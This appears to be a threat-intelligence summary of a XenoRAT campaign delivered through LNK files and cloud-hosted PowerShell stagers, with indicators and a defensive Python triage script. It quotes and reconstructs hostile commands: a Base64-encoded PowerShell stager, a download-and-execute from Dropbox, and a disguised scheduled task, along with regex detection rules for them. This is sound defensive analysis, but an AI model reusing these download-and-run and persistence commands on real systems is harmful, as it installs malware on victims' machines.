ASEC reports attacks in which threat actors use cloud storage services to host decoy documents and malware, including the XenoRAT backdoor, for targeted campaigns. The operation starts from LNK shortcuts that invoke PowerShell, downloads follow-on scripts and registers them with Task Scheduler, and retrieves additional payloads from cloud storage to expand the infection. #XenoRAT #PoliceCyberInvestigationBureau #Dropbox #GoogleDrive
Keypoints
- The campaign uses cloud storage (Dropbox, Google Drive, OneDrive) to host malicious scripts and decoy documents for distribution.
- Initial access is via a shortcut file (LNK) disguised as a harmless HTML document to lure users into clicking.
- The LNK contains PowerShell commands that decode a Base64-encoded payload, save it as ms_temp_08.ps1 in the TEMP folder, and execute it.
- ms_temp_08.ps1 downloads decoy documents and registers a scheduled task named MicrosoftUpdate that re-runs every 30 minutes.
- Decoy documents and script files (SoJ****-F.txt, SoJ****-X.txt, etc.) are hosted per target, and the scripts use Dropbox access tokens to fetch additional malware from cloud storage.
- The chain culminates in XenoRAT, which connects to C2 at 159.100.29.122:8811 and uses the mutex swolf-20010512; the actors collect personal data from pre-designated individuals.
MITRE Techniques
- [T1036] Masquerading – The LNK file is disguised as an HTML document: “The LNK file is disguised as an HTML document file as seen below and has a name that lures users to click it.”
- [T1204.002] User Execution – The LNK file lures users to click it (Police Cyber Investigation Bureau – Internet Use History (check now to keep your PC safe).html.lnk).
- [T1059.001] PowerShell – The LNK file contains PowerShell commands that, once run, decode Base64-encoded commands, save them as ms_temp_08.ps1 in the TEMP folder and execute them.
- [T1027] Obfuscated/Compressed Files and Information – The threat actor altered the leading bytes (file signature) of the payload so it looks like an RTF document; the decompressed data is a C# (.NET) file. “The threat actor changed the front part of the file (file signature) as shown below so that it looks like the RTF document format.” And “The decompressed data is a C# (.NET) file.”
- [T1053.005] Scheduled Task – The script registers a scheduled task that runs every 30 minutes: “Register-ScheduledTask -TaskName ‘MicrosoftUpdate’ … -RepetitionInterval (New-TimeSpan -Minutes 30)”.
- [T1105] Ingress Tool Transfer – The PowerShell commands download decoy documents and additional files from cloud storage via Invoke-WebRequest, e.g., “Invoke-WebRequest -Uri ‘hxxps://dl.dropboxusercontent[.]com/…’ -OutFile $hhh; & $hhh;”
- [T1567.002] Exfiltration to Cloud Storage – The first PS1 script collects PC information and uploads it to Dropbox, so the initial exfiltration rides the same cloud service used for staging rather than the XenoRAT C2 channel.
Indicators of Compromise
- [MD5] File hashes – LNK: c45d209f666f77d70bed61e6fca48bc2; XenoRAT: 238cd8f609b06258ab8b4ded82ebbff8; eight further hashes (script files, etc.) are listed in the original report
- [IP] C2 server – 159.100.29.122:8811
- [Domain] Cloud storage domains used – dropboxusercontent.com, drive.google.com (legitimate services; useful as hunting context alongside the other indicators, not as standalone block entries)
- [File name] Decoy and payload file names – “Police Cyber Investigation Bureau – Internet Use History (check now to keep your PC safe).html.lnk”, “first.ps1”
- [Email] Threat actor email addresses – [email protected], [email protected], [email protected], [email protected], [email protected]
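The keypoints, technique list and indicators above describe one chain: a double-extension LNK spawns PowerShell, Base64 layers are decoded into ms_temp_08.ps1 in TEMP, a MicrosoftUpdate task repeats every 30 minutes, and Invoke-WebRequest pulls from Dropbox before XenoRAT reaches 159.100.29.122:8811. The triage script below is an added example, not code from ASEC or from the campaign: it expands nested Base64 (a UTF-16LE -EncodedCommand wrapping a UTF-8 FromBase64String literal, which is an assumption about the encoding layers) and runs pattern rules keyed to the report's indicators over constructed process, script-block and network events. The sample events, the Dropbox path and the benign task are all constructed for illustration.

```python
import base64
import re

# Indicators quoted from the ASEC writeup; every sample event below is constructed.
C2_ENDPOINT = "159.100.29.122:8811"
CLOUD_HOSTS = ("dl.dropboxusercontent.com", "drive.google.com")
TASK_NAME = "MicrosoftUpdate"
STAGER_NAME = "ms_temp_08.ps1"

RULES = [
    ("T1036 double-extension LNK",
     re.compile(r"\.(?:html?|pdf|docx?|xlsx?|txt)\.lnk\b", re.I)),
    ("T1059.001 Base64-decoded PowerShell",
     re.compile(r"FromBase64String|-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("T1059.001 stager dropped in TEMP",
     re.compile(r"\$env:TEMP\\" + re.escape(STAGER_NAME), re.I)),
    ("T1053.005 " + TASK_NAME + " task every 30 min",
     re.compile(r"Register-ScheduledTask.*?" + TASK_NAME + r".*?New-TimeSpan\s+-Minutes\s+30", re.I | re.S)),
    ("T1105 download from cloud storage",
     re.compile(r"Invoke-WebRequest.*?(?:" + "|".join(map(re.escape, CLOUD_HOSTS)) + ")", re.I | re.S)),
    ("XenoRAT C2 endpoint", re.compile(re.escape(C2_ENDPOINT))),
]

_ENC = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)
_B64LIT = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)


def decode_powershell_blobs(text):
    """Decode -EncodedCommand blobs (always UTF-16LE in PowerShell) and literal
    FromBase64String('...') arguments (assumed UTF-8, matching the
    [Text.Encoding]::UTF8.GetString pattern). Undecodable blobs are skipped."""
    out = []
    for rx, codec in ((_ENC, "utf-16-le"), (_B64LIT, "utf-8")):
        for m in rx.finditer(text):
            try:
                out.append(base64.b64decode(m.group(1), validate=True).decode(codec))
            except (ValueError, UnicodeDecodeError):
                pass
    return out


def expand(text, depth=3):
    """Concatenate the raw text with every decoded layer, up to `depth` levels deep."""
    layers, frontier = [text], [text]
    for _ in range(depth):
        nxt = [d for t in frontier for d in decode_powershell_blobs(t)]
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return "\n".join(layers)


def triage(events):
    """events: dicts with 'id' and 'text'. Returns {id: [matched rule names]} for hits only."""
    hits = {}
    for ev in events:
        text = expand(ev["text"])
        matched = [name for name, rx in RULES if rx.search(text)]
        if matched:
            hits[ev["id"]] = matched
    return hits


def build_sample_events():
    """Constructed telemetry in the shape of the chain (not real captures).
    Stage 2 mirrors the quoted Invoke-WebRequest and Register-ScheduledTask lines;
    the Dropbox path and the $act action variable are placeholders."""
    stage2 = (
        "$hhh = \"$env:TEMP\\decoy.html\"; "
        "Invoke-WebRequest -Uri 'https://dl.dropboxusercontent.com/s/EXAMPLE/decoy.html' -OutFile $hhh; & $hhh; "
        "Register-ScheduledTask -TaskName 'MicrosoftUpdate' -Action $act "
        "-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 30))"
    )
    stage2_b64 = base64.b64encode(stage2.encode("utf-8")).decode()
    stage1 = (
        "$p = \"$env:TEMP\\ms_temp_08.ps1\"; "
        "[IO.File]::WriteAllText($p, [Text.Encoding]::UTF8.GetString("
        "[Convert]::FromBase64String('" + stage2_b64 + "'))); & $p"
    )
    stage1_b64 = base64.b64encode(stage1.encode("utf-16-le")).decode()
    return [
        {"id": "lnk-open", "text": "explorer.exe opened C:\\Users\\victim\\Downloads\\Police Cyber "
                                   "Investigation Bureau - Internet Use History (check now to keep your PC safe).html.lnk"},
        {"id": "ps-spawn", "text": "powershell.exe -w hidden -ep bypass -EncodedCommand " + stage1_b64},
        {"id": "benign", "text": "powershell.exe -File C:\\Scripts\\backup.ps1 Register-ScheduledTask "
                                 "-TaskName 'NightlyBackup' -Trigger (New-ScheduledTaskTrigger -Daily -At 2am)"},
        {"id": "net", "text": "powershell.exe NetworkConnect dst=159.100.29.122:8811"},
    ]


if __name__ == "__main__":
    for event_id, names in triage(build_sample_events()).items():
        print(event_id, "->", ", ".join(names))
```

Only the ps-spawn event carries every stage, and three of its four hits (the TEMP stager, the MicrosoftUpdate task and the Dropbox download) are invisible in the raw command line; they surface only because the Base64 layers are expanded before the rules run. The benign nightly task shares the Register-ScheduledTask verb but not the task name or 30-minute repetition, so it produces no hit. Feed real script-block (Event 4104) text and process command lines into `triage` in the same dict shape.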
Read more: https://asec.ahnlab.com/en/66429/